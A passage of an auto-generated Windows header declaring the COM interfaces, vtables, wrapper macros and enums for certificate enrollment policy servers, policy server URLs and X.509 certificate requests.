            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [in] */ LONG hWndParent,
            /* [in] */ X509EnrollmentAuthFlags flag,
            /* [in] */ __RPC__in BSTR strCredential,
            /* [in] */ __RPC__in BSTR strPassword);
        
        HRESULT ( STDMETHODCALLTYPE *QueryChanges )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeImport )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [in] */ VARIANT val);
        
        HRESULT ( STDMETHODCALLTYPE *Export )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [in] */ X509EnrollmentPolicyExportFlags exportFlags,
            /* [retval][out] */ __RPC__out VARIANT *pVal);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Cost )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__out DWORD *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Cost )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [in] */ DWORD value);
        
        END_INTERFACE
    } IX509EnrollmentPolicyServerVtbl;

    interface IX509EnrollmentPolicyServer
    {
        CONST_VTBL struct IX509EnrollmentPolicyServerVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509EnrollmentPolicyServer_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509EnrollmentPolicyServer_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509EnrollmentPolicyServer_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509EnrollmentPolicyServer_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509EnrollmentPolicyServer_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509EnrollmentPolicyServer_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509EnrollmentPolicyServer_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509EnrollmentPolicyServer_Initialize(This,bstrPolicyServerUrl,bstrPolicyServerId,authFlags,fIsUnTrusted,context)	\
    ( (This)->lpVtbl -> Initialize(This,bstrPolicyServerUrl,bstrPolicyServerId,authFlags,fIsUnTrusted,context) ) 

#define IX509EnrollmentPolicyServer_LoadPolicy(This,option)	\
    ( (This)->lpVtbl -> LoadPolicy(This,option) ) 

#define IX509EnrollmentPolicyServer_GetTemplates(This,pTemplates)	\
    ( (This)->lpVtbl -> GetTemplates(This,pTemplates) ) 

#define IX509EnrollmentPolicyServer_GetCAsForTemplate(This,pTemplate,ppCAs)	\
    ( (This)->lpVtbl -> GetCAsForTemplate(This,pTemplate,ppCAs) ) 

#define IX509EnrollmentPolicyServer_GetCAs(This,ppCAs)	\
    ( (This)->lpVtbl -> GetCAs(This,ppCAs) ) 

#define IX509EnrollmentPolicyServer_Validate(This)	\
    ( (This)->lpVtbl -> Validate(This) ) 

#define IX509EnrollmentPolicyServer_GetCustomOids(This,ppObjectIds)	\
    ( (This)->lpVtbl -> GetCustomOids(This,ppObjectIds) ) 

#define IX509EnrollmentPolicyServer_GetNextUpdateTime(This,pDate)	\
    ( (This)->lpVtbl -> GetNextUpdateTime(This,pDate) ) 

#define IX509EnrollmentPolicyServer_GetLastUpdateTime(This,pDate)	\
    ( (This)->lpVtbl -> GetLastUpdateTime(This,pDate) ) 

#define IX509EnrollmentPolicyServer_GetPolicyServerUrl(This,pValue)	\
    ( (This)->lpVtbl -> GetPolicyServerUrl(This,pValue) ) 

#define IX509EnrollmentPolicyServer_GetPolicyServerId(This,pValue)	\
    ( (This)->lpVtbl -> GetPolicyServerId(This,pValue) ) 

#define IX509EnrollmentPolicyServer_GetFriendlyName(This,pValue)	\
    ( (This)->lpVtbl -> GetFriendlyName(This,pValue) ) 

#define IX509EnrollmentPolicyServer_GetIsDefaultCEP(This,pValue)	\
    ( (This)->lpVtbl -> GetIsDefaultCEP(This,pValue) ) 

#define IX509EnrollmentPolicyServer_GetUseClientId(This,pValue)	\
    ( (This)->lpVtbl -> GetUseClientId(This,pValue) ) 

#define IX509EnrollmentPolicyServer_GetAllowUnTrustedCA(This,pValue)	\
    ( (This)->lpVtbl -> GetAllowUnTrustedCA(This,pValue) ) 

#define IX509EnrollmentPolicyServer_GetCachePath(This,pValue)	\
    ( (This)->lpVtbl -> GetCachePath(This,pValue) ) 

#define IX509EnrollmentPolicyServer_GetCacheDir(This,pValue)	\
    ( (This)->lpVtbl -> GetCacheDir(This,pValue) ) 

#define IX509EnrollmentPolicyServer_GetAuthFlags(This,pValue)	\
    ( (This)->lpVtbl -> GetAuthFlags(This,pValue) ) 

#define IX509EnrollmentPolicyServer_SetCredential(This,hWndParent,flag,strCredential,strPassword)	\
    ( (This)->lpVtbl -> SetCredential(This,hWndParent,flag,strCredential,strPassword) ) 

#define IX509EnrollmentPolicyServer_QueryChanges(This,pValue)	\
    ( (This)->lpVtbl -> QueryChanges(This,pValue) ) 

#define IX509EnrollmentPolicyServer_InitializeImport(This,val)	\
    ( (This)->lpVtbl -> InitializeImport(This,val) ) 

#define IX509EnrollmentPolicyServer_Export(This,exportFlags,pVal)	\
    ( (This)->lpVtbl -> Export(This,exportFlags,pVal) ) 

#define IX509EnrollmentPolicyServer_get_Cost(This,pValue)	\
    ( (This)->lpVtbl -> get_Cost(This,pValue) ) 

#define IX509EnrollmentPolicyServer_put_Cost(This,value)	\
    ( (This)->lpVtbl -> put_Cost(This,value) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509EnrollmentPolicyServer_INTERFACE_DEFINED__ */


#ifndef __IX509PolicyServerUrl_INTERFACE_DEFINED__
#define __IX509PolicyServerUrl_INTERFACE_DEFINED__

/* interface IX509PolicyServerUrl */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509PolicyServerUrl;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("884e204a-217d-11da-b2a4-000e7bbb2b09")
    IX509PolicyServerUrl : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ X509CertificateEnrollmentContext context) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Url( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *ppValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Url( 
            /* [in] */ __RPC__in BSTR pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Default( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Default( 
            /* [in] */ VARIANT_BOOL value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Flags( 
            /* [retval][out] */ __RPC__out PolicyServerUrlFlags *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Flags( 
            /* [in] */ PolicyServerUrlFlags Flags) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_AuthFlags( 
            /* [retval][out] */ __RPC__out X509EnrollmentAuthFlags *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_AuthFlags( 
            /* [in] */ X509EnrollmentAuthFlags Flags) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Cost( 
            /* [retval][out] */ __RPC__out DWORD *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Cost( 
            /* [in] */ DWORD value) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetStringProperty( 
            /* [in] */ PolicyServerUrlPropertyID propertyId,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *ppValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE SetStringProperty( 
            /* [in] */ PolicyServerUrlPropertyID propertyId,
            /* [in] */ __RPC__in BSTR pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE UpdateRegistry( 
            /* [in] */ X509CertificateEnrollmentContext context) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE RemoveFromRegistry( 
            /* [in] */ X509CertificateEnrollmentContext context) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct IX509PolicyServerUrlVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509PolicyServerUrl * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509PolicyServerUrl * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509PolicyServerUrl * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509PolicyServerUrl * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509PolicyServerUrl * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509PolicyServerUrl * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509PolicyServerUrl * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509PolicyServerUrl * This,
            /* [in] */ X509CertificateEnrollmentContext context);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Url )( 
            __RPC__in IX509PolicyServerUrl * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Url )( 
            __RPC__in IX509PolicyServerUrl * This,
            /* [in] */ __RPC__in BSTR pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Default )( 
            __RPC__in IX509PolicyServerUrl * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Default )( 
            __RPC__in IX509PolicyServerUrl * This,
            /* [in] */ VARIANT_BOOL value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Flags )( 
            __RPC__in IX509PolicyServerUrl * This,
            /* [retval][out] */ __RPC__out PolicyServerUrlFlags *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Flags )( 
            __RPC__in IX509PolicyServerUrl * This,
            /* [in] */ PolicyServerUrlFlags Flags);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_AuthFlags )( 
            __RPC__in IX509PolicyServerUrl * This,
            /* [retval][out] */ __RPC__out X509EnrollmentAuthFlags *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_AuthFlags )( 
            __RPC__in IX509PolicyServerUrl * This,
            /* [in] */ X509EnrollmentAuthFlags Flags);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Cost )( 
            __RPC__in IX509PolicyServerUrl * This,
            /* [retval][out] */ __RPC__out DWORD *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Cost )( 
            __RPC__in IX509PolicyServerUrl * This,
            /* [in] */ DWORD value);
        
        HRESULT ( STDMETHODCALLTYPE *GetStringProperty )( 
            __RPC__in IX509PolicyServerUrl * This,
            /* [in] */ PolicyServerUrlPropertyID propertyId,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *ppValue);
        
        HRESULT ( STDMETHODCALLTYPE *SetStringProperty )( 
            __RPC__in IX509PolicyServerUrl * This,
            /* [in] */ PolicyServerUrlPropertyID propertyId,
            /* [in] */ __RPC__in BSTR pValue);
        
        HRESULT ( STDMETHODCALLTYPE *UpdateRegistry )( 
            __RPC__in IX509PolicyServerUrl * This,
            /* [in] */ X509CertificateEnrollmentContext context);
        
        HRESULT ( STDMETHODCALLTYPE *RemoveFromRegistry )( 
            __RPC__in IX509PolicyServerUrl * This,
            /* [in] */ X509CertificateEnrollmentContext context);
        
        END_INTERFACE
    } IX509PolicyServerUrlVtbl;

    interface IX509PolicyServerUrl
    {
        CONST_VTBL struct IX509PolicyServerUrlVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509PolicyServerUrl_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509PolicyServerUrl_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509PolicyServerUrl_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509PolicyServerUrl_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509PolicyServerUrl_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509PolicyServerUrl_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509PolicyServerUrl_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509PolicyServerUrl_Initialize(This,context)	\
    ( (This)->lpVtbl -> Initialize(This,context) ) 

#define IX509PolicyServerUrl_get_Url(This,ppValue)	\
    ( (This)->lpVtbl -> get_Url(This,ppValue) ) 

#define IX509PolicyServerUrl_put_Url(This,pValue)	\
    ( (This)->lpVtbl -> put_Url(This,pValue) ) 

#define IX509PolicyServerUrl_get_Default(This,pValue)	\
    ( (This)->lpVtbl -> get_Default(This,pValue) ) 

#define IX509PolicyServerUrl_put_Default(This,value)	\
    ( (This)->lpVtbl -> put_Default(This,value) ) 

#define IX509PolicyServerUrl_get_Flags(This,pValue)	\
    ( (This)->lpVtbl -> get_Flags(This,pValue) ) 

#define IX509PolicyServerUrl_put_Flags(This,Flags)	\
    ( (This)->lpVtbl -> put_Flags(This,Flags) ) 

#define IX509PolicyServerUrl_get_AuthFlags(This,pValue)	\
    ( (This)->lpVtbl -> get_AuthFlags(This,pValue) ) 

#define IX509PolicyServerUrl_put_AuthFlags(This,Flags)	\
    ( (This)->lpVtbl -> put_AuthFlags(This,Flags) ) 

#define IX509PolicyServerUrl_get_Cost(This,pValue)	\
    ( (This)->lpVtbl -> get_Cost(This,pValue) ) 

#define IX509PolicyServerUrl_put_Cost(This,value)	\
    ( (This)->lpVtbl -> put_Cost(This,value) ) 

#define IX509PolicyServerUrl_GetStringProperty(This,propertyId,ppValue)	\
    ( (This)->lpVtbl -> GetStringProperty(This,propertyId,ppValue) ) 

#define IX509PolicyServerUrl_SetStringProperty(This,propertyId,pValue)	\
    ( (This)->lpVtbl -> SetStringProperty(This,propertyId,pValue) ) 

#define IX509PolicyServerUrl_UpdateRegistry(This,context)	\
    ( (This)->lpVtbl -> UpdateRegistry(This,context) ) 

#define IX509PolicyServerUrl_RemoveFromRegistry(This,context)	\
    ( (This)->lpVtbl -> RemoveFromRegistry(This,context) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509PolicyServerUrl_INTERFACE_DEFINED__ */


#ifndef __IX509PolicyServerListManager_INTERFACE_DEFINED__
#define __IX509PolicyServerListManager_INTERFACE_DEFINED__

/* interface IX509PolicyServerListManager */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509PolicyServerListManager;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("884e204b-217d-11da-b2a4-000e7bbb2b09")
    IX509PolicyServerListManager : public IDispatch
    {
    public:
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_ItemByIndex( 
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt IX509PolicyServerUrl **pVal) = 0;
        
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_Count( 
            /* [retval][out] */ __RPC__out long *pVal) = 0;
        
        virtual /* [restricted][helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get__NewEnum( 
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Add( 
            /* [in] */ __RPC__in_opt IX509PolicyServerUrl *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Remove( 
            /* [in] */ LONG Index) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Clear( void) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ X509CertificateEnrollmentContext context,
            /* [in] */ PolicyServerUrlFlags Flags) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct IX509PolicyServerListManagerVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509PolicyServerListManager * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509PolicyServerListManager * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509PolicyServerListManager * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509PolicyServerListManager * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509PolicyServerListManager * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509PolicyServerListManager * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509PolicyServerListManager * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByIndex )( 
            __RPC__in IX509PolicyServerListManager * This,
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt IX509PolicyServerUrl **pVal);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Count )( 
            __RPC__in IX509PolicyServerListManager * This,
            /* [retval][out] */ __RPC__out long *pVal);
        
        /* [restricted][helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get__NewEnum )( 
            __RPC__in IX509PolicyServerListManager * This,
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Add )( 
            __RPC__in IX509PolicyServerListManager * This,
            /* [in] */ __RPC__in_opt IX509PolicyServerUrl *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Remove )( 
            __RPC__in IX509PolicyServerListManager * This,
            /* [in] */ LONG Index);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Clear )( 
            __RPC__in IX509PolicyServerListManager * This);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509PolicyServerListManager * This,
            /* [in] */ X509CertificateEnrollmentContext context,
            /* [in] */ PolicyServerUrlFlags Flags);
        
        END_INTERFACE
    } IX509PolicyServerListManagerVtbl;

    interface IX509PolicyServerListManager
    {
        CONST_VTBL struct IX509PolicyServerListManagerVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509PolicyServerListManager_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509PolicyServerListManager_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509PolicyServerListManager_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509PolicyServerListManager_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509PolicyServerListManager_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509PolicyServerListManager_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509PolicyServerListManager_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509PolicyServerListManager_get_ItemByIndex(This,Index,pVal)	\
    ( (This)->lpVtbl -> get_ItemByIndex(This,Index,pVal) ) 

#define IX509PolicyServerListManager_get_Count(This,pVal)	\
    ( (This)->lpVtbl -> get_Count(This,pVal) ) 

#define IX509PolicyServerListManager_get__NewEnum(This,pVal)	\
    ( (This)->lpVtbl -> get__NewEnum(This,pVal) ) 

#define IX509PolicyServerListManager_Add(This,pVal)	\
    ( (This)->lpVtbl -> Add(This,pVal) ) 

#define IX509PolicyServerListManager_Remove(This,Index)	\
    ( (This)->lpVtbl -> Remove(This,Index) ) 

#define IX509PolicyServerListManager_Clear(This)	\
    ( (This)->lpVtbl -> Clear(This) ) 

#define IX509PolicyServerListManager_Initialize(This,context,Flags)	\
    ( (This)->lpVtbl -> Initialize(This,context,Flags) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509PolicyServerListManager_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0072 */
/* [local] */ 

typedef 
enum X509RequestType
    {	TypeAny	= 0,
	TypePkcs10	= 1,
	TypePkcs7	= 2,
	TypeCmc	= 3,
	TypeCertificate	= 4
    } 	X509RequestType;

typedef 
enum X509RequestInheritOptions
    {	InheritDefault	= 0,
	InheritNewDefaultKey	= 0x1,
	InheritNewSimilarKey	= 0x2,
	InheritPrivateKey	= 0x3,
	InheritPublicKey	= 0x4,
	InheritKeyMask	= 0xf,
	InheritNone	= 0x10,
	InheritRenewalCertificateFlag	= 0x20,
	InheritTemplateFlag	= 0x40,
	InheritSubjectFlag	= 0x80,
	InheritExtensionsFlag	= 0x100,
	InheritSubjectAltNameFlag	= 0x200,
	InheritValidityPeriodFlag	= 0x400
    } 	X509RequestInheritOptions;

typedef 
enum InnerRequestLevel
    {	LevelInnermost	= 0,
	LevelNext	= 1
    } 	InnerRequestLevel;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0072_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0072_v0_0_s_ifspec;

#ifndef __IX509CertificateRequest_INTERFACE_DEFINED__
#define __IX509CertificateRequest_INTERFACE_DEFINED__

/* interface IX509CertificateRequest */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509CertificateRequest;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab341-217d-11da-b2a4-000e7bbb2b09")
    IX509CertificateRequest : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ X509CertificateEnrollmentContext Context) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Encode( void) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE ResetForEncode( void) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetInnerRequest( 
            /* [in] */ InnerRequestLevel Level,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateRequest **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Type( 
            /* [retval][out] */ __RPC__out X509RequestType *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_EnrollmentContext( 
            /* [retval][out] */ __RPC__out X509CertificateEnrollmentContext *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Silent( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Silent( 
            /* [in] */ VARIANT_BOOL Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ParentWindow( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_ParentWindow( 
            /* [in] */ LONG Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_UIContextMessage( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_UIContextMessage( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_SuppressDefaults( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_SuppressDefaults( 
            /* [in] */ VARIANT_BOOL Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_RenewalCertificate( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_RenewalCertificate( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_ClientId( 
            /* [retval][out] */ __RPC__out RequestClientInfoClientId *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_ClientId( 
            /* [in] */ RequestClientInfoClientId Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_CspInformations( 
            /* [retval][out] */ __RPC__deref_out_opt ICspInformations **ppValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_CspInformations( 
            /* [in] */ __RPC__in_opt ICspInformations *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_HashAlgorithm( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_HashAlgorithm( 
            /* [in] */ __RPC__in_opt IObjectId *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_AlternateSignatureAlgorithm( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_AlternateSignatureAlgorithm( 
            /* [in] */ VARIANT_BOOL Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_RawData( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct IX509CertificateRequestVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509CertificateRequest * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509CertificateRequest * This);
        
